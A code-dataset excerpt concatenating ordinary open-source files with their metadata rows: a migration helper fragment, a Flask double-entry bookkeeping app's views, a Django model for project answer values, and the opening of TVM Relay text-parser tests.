"""Get the project's change script repository
:param abs_path: Absolute path to migrate repository
"""
global _REPOSITORY
if not os.path.exists(abs_path):
raise exception.DbMigrationError("Path %s not found" % abs_path)
if _REPOSITORY is None:
_REPOSITORY = Repository(abs_path)
return _REPOSITORY
| apache-2.0 | -3,339,525,715,949,184,000 | 35.140288 | 79 | 0.695431 | false |
enikesha/pacioli | pacioli/views.py | 1 | 31775 | # Copyright (c) 2014, Satoshi Nakamoto Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import io
import uuid
import ast
import csv
import calendar
from collections import OrderedDict
from datetime import datetime,date
from flask import flash, render_template, request, redirect, url_for, send_from_directory, send_file
from pacioli import app, db, forms, models
import sqlalchemy
from sqlalchemy.sql import func
from sqlalchemy.orm import aliased
from pacioli.accounting.memoranda import process_filestorage
import pacioli.accounting.ledgers as ledgers
import pacioli.accounting.rates as rates
import pacioli.accounting.valuations as valuations
@app.route('/')
def index():
return render_template("index.html")
@app.route('/Configure')
def configure():
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts')
def chart_of_accounts():
classificationform = forms.NewClassification()
accountform = forms.NewAccount()
subaccountform = forms.NewSubAccount()
subaccounts = models.Subaccounts.query.all()
return render_template("configure/chart_of_accounts.html",
subaccounts=subaccounts,
classificationform=classificationform,
accountform=accountform,
subaccountform=subaccountform)
@app.route('/Configure/ChartOfAccounts/AddClassification', methods=['POST','GET'])
def add_classification():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['classification']
parent = form['classificationparent']
parent = models.Elements.query.filter_by(id=parent).one()
parent = parent.name
classification = models.Classifications(name=name, parent=parent)
db.session.add(classification)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteClassification/<classification>')
def delete_classification(classification):
classification = models.Classifications \
.query \
.filter_by(name=classification) \
.first()
db.session.delete(classification)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/AddAccount', methods=['POST','GET'])
def add_account():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['account']
parent = form['accountparent']
parent = models.Classifications \
.query \
.filter_by(id=parent) \
.one()
parent = parent.name
account = models.Accounts(name=name, parent=parent)
db.session.add(account)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteAccount/<account>')
def delete_account(account):
account = models.Accounts.query.filter_by(name=account).first()
db.session.delete(account)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/AddSubAccount', methods=['POST','GET'])
def add_subaccount():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['subaccount']
parent = form['subaccountparent']
parent = models.Accounts.query.filter_by(id=parent).one()
parent = parent.name
subaccount = models.Subaccounts(name=name, parent=parent)
db.session.add(subaccount)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteSubAccount/<subaccount>')
def delete_subaccount(subaccount):
subaccount = models.Accounts.query.filter_by(name=subaccount).first()
db.session.delete(subaccount)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Bookkeeping')
def bookkeeping():
return redirect(url_for('upload_csv'))
@app.route('/Bookkeeping/Memoranda/Upload', methods=['POST','GET'])
def upload_csv():
filenames = ''
if request.method == 'POST':
uploaded_files = request.files.getlist("file[]")
for file in uploaded_files:
process_filestorage(file)
return redirect(url_for('upload_csv'))
memos = models.Memoranda \
.query \
.order_by(models.Memoranda.date.desc()) \
.all()
return render_template('bookkeeping/upload.html',
title = 'Upload',
memos=memos)
@app.route('/Bookkeeping/Memoranda/ExchangeRates')
def exchange_rates():
return render_template("bookkeeping/exchange_rates.html")
@app.route('/Bookkeeping/Memoranda/DownloadRates')
def download_rates():
rates.download_rates()
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/Summarize')
def summarize_rates():
rates.summarize_rates("pacioli")
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/Import')
def import_rates():
rates.import_rates("pacioli")
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/CalculateGains/<method>')
def calc_gains(method):
valuations.calculate_bitcoin_gains(method)
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/Memos', methods=['POST','GET'])
def memoranda():
memos = models.Memoranda \
.query \
.order_by(models.Memoranda.date.desc()) \
.all()
for memo in memos:
transactions = models.MemorandaTransactions \
.query \
.filter_by(memoranda_id=memo.id) \
.all()
memo.count = len(transactions)
return render_template('bookkeeping/memos.html',
title = 'Memoranda',
memos=memos)
@app.route('/Bookkeeping/Memoranda/Memos/Delete/<fileName>')
def delete_memoranda(fileName):
memo = models.Memoranda \
.query \
.filter_by(fileName=fileName) \
.first()
transactions = models.MemorandaTransactions \
.query \
.filter_by(memoranda_id=memo.id) \
.all()
for transaction in transactions:
journal_entry = models.JournalEntries \
.query \
.filter_by(memoranda_transactions_id=transaction.id) \
.first()
ledger_entries = models.LedgerEntries \
.query \
.filter_by(journal_entry_id = journal_entry.id) \
.all()
for entry in ledger_entries:
db.session.delete(entry)
db.session.commit()
db.session.delete(journal_entry)
db.session.commit()
db.session.delete(transaction)
db.session.commit()
db.session.delete(memo)
db.session.commit()
return redirect(url_for('upload_csv'))
@app.route('/Bookkeeping/Memoranda/Memos/<fileName>')
def memo_file(fileName):
memo = models.Memoranda.query.filter_by(fileName=fileName).first()
fileText = memo.fileText
document = io.StringIO(fileText)
reader = csv.reader(document)
rows = [pair for pair in reader]
return render_template('bookkeeping/memo_file.html',
title = 'Memo',
rows=rows,
fileName=fileName)
@app.route('/Bookkeeping/Memoranda/Memos/Transactions')
def transactions():
transactions = models.MemorandaTransactions.query.all()
for transaction in transactions:
transaction.details = ast.literal_eval(transaction.details)
journal_entry = models.JournalEntries.query.filter_by(memoranda_transactions_id=transaction.id).first()
transaction.journal_entry_id = journal_entry.id
return render_template('bookkeeping/memo_transactions.html',
title = 'Memo',
transactions=transactions)
@app.route('/Bookkeeping/Memoranda/Memos/<fileName>/Transactions')
def memo_transactions(fileName):
memo = models.Memoranda.query.filter_by(fileName=fileName).first()
transactions = models.MemorandaTransactions.query.filter_by(memoranda_id=memo.id).all()
for transaction in transactions:
transaction.details = ast.literal_eval(transaction.details)
journal_entry = models.JournalEntries.query.filter_by(memoranda_transactions_id=transaction.id).first()
transaction.journal_entry_id = journal_entry.id
return render_template('bookkeeping/memo_transactions.html',
title = 'Memo',
transactions=transactions,
fileName=fileName)
@app.route('/Bookkeeping/GeneralJournal/<currency>')
def general_journal(currency):
journal_entries = db.session \
.query(models.JournalEntries) \
.filter(models.JournalEntries.ledgerentries \
.any(currency=currency)) \
.join(models.LedgerEntries) \
.order_by(models.LedgerEntries.date.desc()) \
.all()
for journal_entry in journal_entries:
journal_entry.ledgerentries = [c for c in journal_entry.ledgerentries if c.currency == currency]
return render_template('bookkeeping/general_journal.html',
title = 'General Journal',
journal_entries=journal_entries,
currency=currency)
@app.route('/Bookkeeping/GeneralJournal/Entry/<id>')
def journal_entry(id):
journal_entry = models.JournalEntries.query.filter_by(id = id).first()
ledger_entries = models.LedgerEntries.query.filter_by(journal_entry_id = id).order_by(models.LedgerEntries.date.desc()).order_by(models.LedgerEntries.tside.desc()).all()
transaction = models.MemorandaTransactions.query.filter_by(id=journal_entry.memoranda_transactions_id).first()
memo = models.Memoranda.query.filter_by(id=transaction.memoranda_id).first()
transaction.details = ast.literal_eval(transaction.details)
print(ledger_entries)
return render_template('bookkeeping/journal_entry.html',
title = 'Journal Entry',
journal_entry=journal_entry,
ledger_entries=ledger_entries,
transaction=transaction,
memo=memo)
@app.route('/Bookkeeping/GeneralJournal/<id>/Edit', methods=['POST','GET'])
def edit_journal_entry(id):
journal_entry = models.JournalEntries.query.filter_by(id = id).first()
ledger_entries = models.LedgerEntries.query.filter_by(journal_entry_id = id).order_by(models.LedgerEntries.date.desc()).order_by(models.LedgerEntries.tside.desc()).all()
transaction = models.MemorandaTransactions.query.filter_by(id=journal_entry.memoranda_transactions_id).first()
memo = models.Memoranda.query.filter_by(id=transaction.memoranda_id).first()
transaction.details = ast.literal_eval(transaction.details)
return render_template('bookkeeping/journal_entry_edit.html',
title = 'Journal Entry',
journal_entry=journal_entry,
ledger_entries=ledger_entries,
transaction=transaction,
memo=memo)
@app.route('/Bookkeeping/GeneralLedger/<currency>')
def general_ledger(currency):
accountsQuery = db.session\
.query(models.LedgerEntries.ledger)\
.group_by(models.LedgerEntries.ledger).all()
accounts = []
for accountResult in accountsQuery:
accountName = accountResult[0]
query = ledgers.query_entries(accountName, 'Monthly', currency)
accounts.append(query)
return render_template('bookkeeping/general_ledger.html',
title = 'General Ledger',
accounts=accounts,
currency=currency)
@app.route('/Bookkeeping/Ledger/<accountName>/<currency>/<groupby>')
def ledger(accountName, currency, groupby):
query = ledgers.query_entries(accountName, groupby, currency)
return render_template('bookkeeping/ledger.html',
title = 'Ledger',
currency=currency,
account=query[0],
ledger_entries=query[1],
groupby = groupby,
accountName=accountName)
@app.route('/Bookkeeping/Ledger/<accountName>/<currency>/<groupby>/<interval>')
def ledger_page(accountName, currency, groupby, interval):
if groupby == "Daily":
interval = datetime.strptime(interval, "%m-%d-%Y")
year = interval.year
month = interval.month
day = interval.day
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month, \
func.date_part('day', models.LedgerEntries.date)==day) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.asc()) \
.all()
account = ledgers.foot_account(accountName, ledger_entries, 'All')
if groupby == "Monthly":
interval = datetime.strptime(interval, "%m-%Y")
year = interval.year
month = interval.month
ledger_entries = models.LedgerEntries\
.query\
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month)\
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
account = ledgers.foot_account(accountName, ledger_entries, 'All')
return render_template('bookkeeping/ledger.html',
title = 'Ledger',
account=account,
ledger_entries=ledger_entries,
groupby2 = groupby,
groupby = 'All',
accountName=accountName,
interval=interval,
currency=currency)
@app.route('/Bookkeeping/TrialBalance/<currency>')
def trial_balance(currency):
accountsQuery = db.session \
.query(models.LedgerEntries.ledger) \
.group_by(models.LedgerEntries.ledger) \
.filter(models.LedgerEntries.currency==currency) \
.all()
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date) + '-'+
func.date_part('month', models.LedgerEntries.date)) \
.filter(models.LedgerEntries.currency==currency) \
.group_by(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
period = datetime.now()
year = period.year
month = period.month
accounts = []
totalDebits = 0
totalCredits = 0
for accountResult in accountsQuery:
accountName = accountResult[0]
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName)\
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year,
func.date_part('month', models.LedgerEntries.date)==month) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
query = ledgers.foot_account(accountName, ledger_entries, 'All')
totalDebits += query['debitBalance']
totalCredits += query['creditBalance']
accounts.append(query)
return render_template('bookkeeping/trial_balance.html',
currency=currency,
periods=periods,
period=period,
accounts=accounts,
totalDebits=totalDebits,
totalCredits=totalCredits)
@app.route('/Bookkeeping/TrialBalance/<currency>/<groupby>/<period>')
def trial_balance_historical(currency, groupby, period):
accountsQuery = db.session \
.query(models.LedgerEntries.ledger) \
.group_by(models.LedgerEntries.ledger) \
.filter(models.LedgerEntries.currency==currency) \
.all()
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date) + '-'+
func.date_part('month', models.LedgerEntries.date)) \
.group_by(\
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.filter(models.LedgerEntries.currency==currency) \
.all()
period = datetime.strptime(period, "%Y-%m")
year = period.year
month = period.month
day = calendar.monthrange(year, month)[1]
period = datetime(year, month, day, 23, 59, 59)
accounts = []
totalDebits = 0
totalCredits = 0
for accountResult in accountsQuery:
accountName = accountResult[0]
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
query = ledgers.foot_account(accountName, ledger_entries, 'All')
totalDebits += query['debitBalance']
totalCredits += query['creditBalance']
accounts.append(query)
return render_template('bookkeeping/trial_balance.html',
currency=currency,
periods=periods,
period=period,
accounts=accounts,
totalDebits=totalDebits,
totalCredits=totalCredits)
@app.route('/FinancialStatements')
def financial_statements():
return redirect(url_for('income_statement', currency='satoshis'))
@app.route('/FinancialStatements/IncomeStatement/<currency>')
def income_statement(currency):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.now()
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, period.day, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
for account in classification.accounts:
for subaccount in account.subaccounts:
subaccount.total = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
subaccount.total += ledger_entry.amount
net_income += ledger_entry.amount
elif ledger_entry.tside == 'debit':
net_income -= ledger_entry.amount
subaccount.total -= ledger_entry.amount
return render_template('financial_statements/income_statement.html',
title = 'Income Statement',
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
@app.route('/FinancialStatements/IncomeStatement/<currency>/<period>')
def income_statement_historical(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
for account in classification.accounts:
for subaccount in account.subaccounts:
subaccount.total = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
net_income += ledger_entry.amount
subaccount.total += ledger_entry.amount
elif ledger_entry.tside == 'debit':
net_income -= ledger_entry.amount
subaccount.total -= ledger_entry.amount
return render_template('financial_statements/income_statement.html',
title = 'Income Statement',
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
@app.route('/FinancialStatements/BalanceSheet/<currency>')
def balance_sheet(currency):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.now()
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, period.day, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
retained_earnings = 0
for element in elements:
element.balance = 0
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
element.balance -= ledger_entry.amount
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
element.balance += ledger_entry.amount
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
if element.name == 'Equity':
retained_earnings = -element.balance
print(retained_earnings)
elements = [c for c in elements if c.name in ['Assets', 'Liabilities']]
return render_template('financial_statements/balance_sheet.html',
periods=periods,
currency=currency,
elements=elements,
retained_earnings=retained_earnings,
period=period_end)
@app.route('/FinancialStatements/BalanceSheet/<currency>/<period>')
def balance_sheet_historical(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
retained_earnings = 0
for element in elements:
element.balance = 0
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
element.balance -= ledger_entry.amount
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
element.balance += ledger_entry.amount
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
if element.name == 'Equity':
retained_earnings = -element.balance
print(retained_earnings)
elements = [c for c in elements if c.name in ['Assets', 'Liabilities']]
return render_template('financial_statements/balance_sheet.html',
periods=periods,
currency=currency,
elements=elements,
retained_earnings=retained_earnings,
period=period_end)
@app.route('/FinancialStatements/StatementOfCashFlows/<currency>/<period>')
def statement_of_cash_flows(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
if period == 'Current':
period = datetime.now()
lastday = period.day
else:
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
return render_template('financial_statements/statement_of_cash_flows.html',
period = period,
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
| bsd-3-clause | 207,046,590,486,542,980 | 43.070735 | 757 | 0.628419 | false |
rdmorganiser/rdmo | rdmo/projects/models/value.py | 1 | 6697 | import mimetypes
from pathlib import Path
import iso8601
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_cleanup import cleanup
from rdmo.core.constants import (VALUE_TYPE_BOOLEAN, VALUE_TYPE_CHOICES,
VALUE_TYPE_DATETIME, VALUE_TYPE_TEXT)
from rdmo.core.models import Model
from rdmo.domain.models import Attribute
from rdmo.options.models import Option
from ..managers import ValueManager
from ..utils import get_value_path
def get_file_upload_to(instance, filename):
return str(get_value_path(instance.project, instance.snapshot) / str(instance.id) / filename)
class Value(Model):
objects = ValueManager()
FALSE_TEXT = [None, '', '0', 'f', 'F', 'false', 'False']
project = models.ForeignKey(
'Project', on_delete=models.CASCADE, related_name='values',
verbose_name=_('Project'),
help_text=_('The project this value belongs to.')
)
snapshot = models.ForeignKey(
'Snapshot', blank=True, null=True,
on_delete=models.CASCADE, related_name='values',
verbose_name=_('Snapshot'),
help_text=_('The snapshot this value belongs to.')
)
attribute = models.ForeignKey(
Attribute, blank=True, null=True,
on_delete=models.SET_NULL, related_name='values',
verbose_name=_('Attribute'),
help_text=_('The attribute this value belongs to.')
)
set_index = models.IntegerField(
default=0,
verbose_name=_('Set index'),
help_text=_('The position of this value in an entity collection (i.e. in the question set)')
)
collection_index = models.IntegerField(
default=0,
verbose_name=_('Collection index'),
help_text=_('The position of this value in an attribute collection.')
)
text = models.TextField(
blank=True,
verbose_name=_('Text'),
help_text=_('The string stored for this value.')
)
option = models.ForeignKey(
Option, blank=True, null=True, on_delete=models.SET_NULL, related_name='values',
verbose_name=_('Option'),
help_text=_('The option stored for this value.')
)
file = models.FileField(
upload_to=get_file_upload_to, null=True, blank=True,
verbose_name=_('File'),
help_text=_('The file stored for this value.')
)
value_type = models.CharField(
max_length=8, choices=VALUE_TYPE_CHOICES, default=VALUE_TYPE_TEXT,
verbose_name=_('Value type'),
help_text=_('Type of this value.')
)
unit = models.CharField(
max_length=64, blank=True,
verbose_name=_('Unit'),
help_text=_('Unit for this value.')
)
external_id = models.CharField(
max_length=256, blank=True,
verbose_name=_('External id'),
help_text=_('External id for this value.')
)
class Meta:
ordering = ('attribute', 'set_index', 'collection_index')
verbose_name = _('Value')
verbose_name_plural = _('Values')
@property
def as_dict(self):
value_dict = {
'id': self.id,
'created': self.created,
'updated': self.updated,
'set_index': self.set_index,
'collection_index': self.collection_index,
'value_type': self.value_type,
'unit': self.unit,
'external_id': self.external_id,
'value': self.value,
'value_and_unit': self.value_and_unit,
'is_true': self.is_true,
'is_false': self.is_false,
'as_number': self.as_number
}
if self.file:
value_dict.update({
'file_name': self.file_name,
'file_url': self.file_url,
'file_type': self.file_type,
'file_path': self.file_path
})
return value_dict
@property
def value(self):
if self.option:
value = self.option.text or ''
if self.option.additional_input and self.text:
value += ': ' + self.text
return value
elif self.file:
return self.file_name
elif self.text:
if self.value_type == VALUE_TYPE_DATETIME:
try:
return iso8601.parse_date(self.text).date()
except iso8601.ParseError:
return self.text
elif self.value_type == VALUE_TYPE_BOOLEAN:
if self.text == '1':
return _('Yes')
else:
return _('No')
else:
return self.text
else:
return None
@property
def value_and_unit(self):
value = self.value
if value is None:
return ''
elif self.unit:
return '%s %s' % (value, self.unit)
else:
return value
@property
def is_true(self):
return self.text not in self.FALSE_TEXT
@property
def is_false(self):
return self.text in self.FALSE_TEXT
@property
def as_number(self):
try:
val = self.text
except AttributeError:
return 0
else:
if isinstance(val, str):
val = val.replace(',', '.')
if isinstance(val, float) is False:
try:
return int(val)
except (ValueError, TypeError):
pass
try:
return float(val)
except (ValueError, TypeError):
return 0
else:
return val
@property
def file_name(self):
if self.file:
return Path(self.file.name).name
@property
def file_url(self):
if self.file:
return reverse('v1-projects:value-file', args=[self.id])
@property
def file_type(self):
if self.file:
return mimetypes.guess_type(self.file.name)[0]
@property
def file_path(self):
if self.file:
resource_path = get_value_path(self.project, self.snapshot)
return Path(self.file.name).relative_to(resource_path).as_posix()
def copy_file(self, file_name, file_content):
# copies a file field from a different value over to this value
# this is tricky, because we need to trick django_cleanup to not delete the original file
# important for snapshots and import from projects
self.file.save(file_name, file_content, save=False)
cleanup.refresh(self)
self.save()
| apache-2.0 | 2,072,839,092,465,988,000 | 30.148837 | 100 | 0.558907 | false |
sxjscience/tvm | tests/python/relay/test_ir_parser.py | 1 | 22635 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing
import pytest
from numpy import isclose
from typing import Union
from functools import wraps
SEMVER = '#[version = "0.0.5"]\n'
BINARY_OPS = {
"*": relay.multiply,
"/": relay.divide,
"+": relay.add,
"-": relay.subtract,
"<": relay.less,
">": relay.greater,
"<=": relay.less_equal,
">=": relay.greater_equal,
"==": relay.equal,
"!=": relay.not_equal,
}
TYPES = {
"int8",
"int16",
"int32",
"int64",
"uint8",
"uint16",
"uint32",
"uint64",
"float16",
"float32",
"float64",
"bool",
"int8x4",
"uint1x4",
"float16x4",
}
LIST_DEFN = """
type List[A] {
Cons(A, List[A]),
Nil,
}
"""
def assert_graph_equal(lhs, rhs):
tvm.ir.assert_structural_equal(lhs, rhs, map_free_vars=True)
def graph_equal(lhs, rhs):
return tvm.ir.structural_equal(lhs, rhs, map_free_vars=True)
def roundtrip_expr(expr):
text = tvm.relay.Expr.astext(expr, show_meta_data=False)
x = tvm.parser.parse_expr(text)
assert_graph_equal(x, expr)
# Testing Utilities for expressions.
def roundtrip(expr):
x = tvm.parser.fromtext(expr.astext())
assert_graph_equal(x, expr)
def parse_text(code):
expr = tvm.parser.parse_expr(code)
roundtrip_expr(expr)
return expr
def parses_as(code, expr):
# type: (str, relay.Expr) -> bool
parsed = parse_text(code)
result = graph_equal(parsed, expr)
return result
# Testing Utilities for full modules.
def parse_module(code):
mod = tvm.parser.parse(SEMVER + code)
roundtrip(mod)
return mod
def assert_parses_as(code, expr):
parsed = parse_text(code)
assert_graph_equal(parsed, expr)
def assert_parse_module_as(code, mod):
mod = tvm.relay.transform.InferType()(mod)
parsed = parse_module(code)
assert_graph_equal(parsed, mod)
def get_scalar(x):
# type: (relay.Constant) -> (Union[float, int, bool])
return x.data.asnumpy().item()
int32 = relay.scalar_type("int32")
_ = relay.Var("_")
X = relay.Var("x")
Y = relay.Var("y")
X_ANNO = relay.Var("x", int32)
Y_ANNO = relay.Var("y", int32)
UNIT = relay.Tuple([])
def test_comments():
assert_parses_as(
"""
// This is a line comment!
()
""",
UNIT,
)
assert_parses_as(
"""
/* This is a block comment!
This is still a block comment!
*/
()
""",
UNIT,
)
assert_parses_as(
"""
/* This is a block comment!
/*Block comment is recursive!*/
*/
()
""",
UNIT,
)
def test_int_literal():
assert isinstance(parse_text("1"), relay.Constant)
